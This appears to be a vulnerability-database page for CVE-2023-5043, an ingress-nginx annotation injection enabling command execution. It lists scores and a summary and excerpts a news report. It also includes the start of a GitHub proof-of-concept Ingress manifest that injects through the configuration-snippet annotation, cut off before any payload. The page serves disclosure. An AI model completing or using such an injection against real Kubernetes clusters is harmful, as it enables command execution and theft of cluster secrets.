CVE-2023-5043

Published: 25/10/2023 Updated: 07/03/2024
CVSS v3 Base Score: 8.8 | Impact Score: 5.9 | Exploitability Score: 2.8
VMScore: 0

Vulnerability Summary

Ingress nginx annotation injection causes arbitrary command execution.

Vulnerable Product

kubernetes ingress-nginx

Github Repositories

PoC CVE-2023-5043

CVE-2023-5043
Ingress nginx annotation injection causes arbitrary command execution

Create Ingress (can be created without Service and Pod)

    apiVersion: networking.k8s.io/v1
    kind: Ingress
    metadata:
      name: ingress-exploit
      annotations:
        kubernetes.io/ingress.class: "nginx"
        nginx.ingress.kubernetes.io/configuration-snippet: |
          more_set_headers "robin

Recent Articles

Unpatched NGINX ingress controller bugs can be abused to steal Kubernetes cluster secrets
The Register

Just tricks, no treats with these 3 vulns

Three unpatched high-severity bugs in the NGINX ingress controller can be abused by miscreants to steal credentials and other secrets from Kubernetes clusters.  The vulnerabilities, tracked as CVE-2023-5043, CVE-2023-5044 and CVE-2022-4886, were disclosed on October 27, and are listed as currently awaiting triage. It's unclear if any of the flaws have been exploited. The Register did not immediately receive a response to questions, including if the bugs have been found and exploited and whe...